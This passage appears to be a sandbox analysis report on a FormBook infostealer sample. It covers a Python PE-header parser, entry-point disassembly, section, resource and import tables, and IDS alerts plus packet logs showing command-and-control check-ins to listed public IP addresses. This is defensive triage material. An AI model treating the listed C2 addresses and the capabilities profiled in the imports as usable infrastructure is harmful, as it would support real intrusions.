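        raise ValueError("only PE32 (magic 0x10b) handled here")
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<I", data, opt + 28)
    os_maj, os_min, _, _, ss_maj, ss_min = struct.unpack_from("<6H", data, opt + 40)
    subsystem, dllchars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "machine": machine,
        "timestamp": timestamp_utc(ts),
        "characteristics": flag_names(chars, FILE_FLAGS),
        "entry_va": image_base + entry_rva,
        "image_base": image_base,
        "os_version": f"{os_maj}.{os_min}",
        "subsystem_version": f"{ss_maj}.{ss_min}",
        "subsystem": SUBSYSTEMS.get(subsystem, f"unknown({subsystem})"),
        "dll_characteristics": flag_names(dllchars, DLL_FLAGS),
    }

def hardening_gaps(info):
    """Mitigations the image does not opt into; each is a line a triage note should carry."""
    gaps = []
    if "DYNAMIC_BASE" not in info["dll_characteristics"]:
        gaps.append("no ASLR opt-in (DYNAMIC_BASE clear)")
    if "RELOCS_STRIPPED" in info["characteristics"]:
        gaps.append("relocations stripped: image cannot be rebased at all")
    if "NX_COMPAT" not in info["dll_characteristics"]:
        gaps.append("no DEP opt-in (NX_COMPAT clear)")
    return gaps

def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def build_sample_header():
    """Constructed PE32 header carrying the report's static values; the real
    1,336,099-byte sample is not needed to exercise the header logic."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)          # e_lfanew at offset 60
    coff = struct.pack("<HHIIIHH", 0x14C, 4, 0x4F25BAEC, 0, 0, 224, 0x0123)  # I386, TimeDateStamp, flags
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHH",
                      0x10B, 0, 0, 0, 0, 0,
                      0x165C1,                  # AddressOfEntryPoint -> VA 0x4165c1
                      0, 0, 0x400000, 0x1000, 0x200,
                      5, 0, 5, 0, 5, 0,         # OS / image / subsystem versions
                      0, 0, 0, 0,
                      2,                        # IMAGE_SUBSYSTEM_WINDOWS_GUI
                      0x8000)                   # TERMINAL_SERVER_AWARE only
    return dos + b"PE\x00\x00" + coff + opt.ljust(224, b"\x00")

if __name__ == "__main__":
    info = parse_pe(build_sample_header())
    for key, value in info.items():
        print(f"{key}: {value}")
    print("gaps:", hardening_gaps(info))
    # Constructed inputs bracketing the report's entropy values (0.91 and 7.99).
    print("entropy(zero page):", shannon_entropy(b"\x00" * 2048))
    print("entropy(uniform bytes):", shannon_entropy(bytes(range(256)) * 8))
```

Feed parse_pe the first few kilobytes of any PE32 file to get the same fields the report tabulates; for a 64-bit image the magic is 0x20b and the ImageBase and version offsets differ, which is why the function refuses it rather than misreading it. The import hash is not reproduced here because it needs the import directory, not just the headers.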
Instruction
call 00007FC9F48CFEEBh
jmp 00007FC9F48C6D5Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FC9F48C6EDAh
cmp edi, eax
jc 00007FC9F48C7076h
cmp ecx, 00000080h
jc 00007FC9F48C6EEEh
cmp dword ptr [004A9724h], 00000000h
je 00007FC9F48C6EE5h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FC9F48C6ED7h
jmp 00007FC9F48C72B2h
test edi, 00000003h
jne 00007FC9F48C6EE6h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FC9F48C6EFBh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FC9F48C6EDEh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007FC9F6D3F6D7h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FC9F48C6E9Eh
rep movsd
jmp dword ptr [00000000h+edx*4]
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                                                                                                                                                DLLImport
                                                                                                                                                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, 
LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll: DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll: VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-09T13:02:39.509624+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49820 | 85.159.66.93 | 80 | TCP
2024-10-09T13:02:52.764900+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49824 | 13.248.169.48 | 80 | TCP
2024-10-09T13:03:09.672799+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49829 | 103.255.237.233 | 80 | TCP
2024-10-09T13:03:22.910634+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49833 | 104.21.77.69 | 80 | TCP
2024-10-09T13:03:37.015594+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49837 | 65.21.196.90 | 80 | TCP
2024-10-09T13:03:51.267544+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49841 | 3.33.130.190 | 80 | TCP
2024-10-09T13:04:04.522902+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49845 | 3.33.130.190 | 80 | TCP
2024-10-09T13:04:17.750385+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49849 | 199.59.243.227 | 80 | TCP
2024-10-09T13:04:31.285707+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49853 | 45.56.219.238 | 80 | TCP
2024-10-09T13:04:44.910690+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49857 | 162.0.238.43 | 80 | TCP
2024-10-09T13:04:58.271235+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49861 | 23.227.38.74 | 80 | TCP
2024-10-09T13:05:11.747519+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49865 | 84.32.84.32 | 80 | TCP
2024-10-09T13:05:25.377801+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49869 | 54.67.42.145 | 80 | TCP
2024-10-09T13:05:45.583958+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49873 | 3.33.130.190 | 80 | TCP
2024-10-09T13:05:59.785367+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49877 | 81.2.196.19 | 80 | TCP
2024-10-09T13:06:13.274403+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49881 | 84.32.84.32 | 80 | TCP
2024-10-09T13:07:21.807766+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.30 | 49882 | 85.159.66.93 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 13:01:39.080358982 CEST | 49820 | 80 | 192.168.11.30 | 85.159.66.93
Oct 9, 2024 13:01:39.291022062 CEST | 80 | 49820 | 85.159.66.93 | 192.168.11.30
Oct 9, 2024 13:01:39.291172981 CEST | 49820 | 80 | 192.168.11.30 | 85.159.66.93
Oct 9, 2024 13:01:39.297161102 CEST | 49820 | 80 | 192.168.11.30 | 85.159.66.93
Oct 9, 2024 13:01:39.548588991 CEST | 80 | 49820 | 85.159.66.93 | 192.168.11.30
Oct 9, 2024 13:02:39.509224892 CEST | 80 | 49820 | 85.159.66.93 | 192.168.11.30
Oct 9, 2024 13:02:39.509624004 CEST | 49820 | 80 | 192.168.11.30 | 85.159.66.93
Oct 9, 2024 13:02:39.513328075 CEST | 49820 | 80 | 192.168.11.30 | 85.159.66.93
Oct 9, 2024 13:02:39.724024057 CEST | 80 | 49820 | 85.159.66.93 | 192.168.11.30
Oct 9, 2024 13:02:44.625262022 CEST | 49821 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:44.726670980 CEST | 80 | 49821 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:44.726963997 CEST | 49821 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:44.738545895 CEST | 49821 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:44.839080095 CEST | 80 | 49821 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:44.839575052 CEST | 80 | 49821 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:44.839847088 CEST | 49821 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:46.251211882 CEST | 49821 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:46.351672888 CEST | 80 | 49821 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:47.269274950 CEST | 49822 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:47.372133017 CEST | 80 | 49822 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:47.372394085 CEST | 49822 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:47.381544113 CEST | 49822 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:47.483520985 CEST | 80 | 49822 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:47.483632088 CEST | 80 | 49822 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:47.483844995 CEST | 49822 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:48.891258001 CEST | 49822 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:48.992986917 CEST | 80 | 49822 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:49.909465075 CEST | 49823 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:50.015291929 CEST | 80 | 49823 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:50.015455961 CEST | 49823 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:50.025144100 CEST | 49823 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:50.025192976 CEST | 49823 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:50.127244949 CEST | 80 | 49823 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:50.127499104 CEST | 80 | 49823 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:50.127511978 CEST | 80 | 49823 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:50.127624989 CEST | 80 | 49823 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:52.549700022 CEST | 49824 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:52.652781963 CEST | 80 | 49824 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:52.653806925 CEST | 49824 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:52.661657095 CEST | 49824 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:52.763072014 CEST | 80 | 49824 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:52.764462948 CEST | 80 | 49824 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:52.764477968 CEST | 80 | 49824 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:02:52.764899969 CEST | 49824 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:52.767976046 CEST | 49824 | 80 | 192.168.11.30 | 13.248.169.48
Oct 9, 2024 13:02:52.870081902 CEST | 80 | 49824 | 13.248.169.48 | 192.168.11.30
Oct 9, 2024 13:03:00.230613947 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:00.595402956 CEST | 80 | 49826 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:00.595700026 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:00.605992079 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:01.341492891 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:01.703147888 CEST | 80 | 49826 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:01.703280926 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:01.704184055 CEST | 80 | 49826 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:02.106976032 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:02.470777035 CEST | 80 | 49826 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:03.126908064 CEST | 49827 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:03.495433092 CEST | 80 | 49827 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:03.495568991 CEST | 49827 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:03.505832911 CEST | 49827 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:03.871237040 CEST | 80 | 49827 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:03.872775078 CEST | 80 | 49827 | 103.255.237.233 | 192.168.11.30
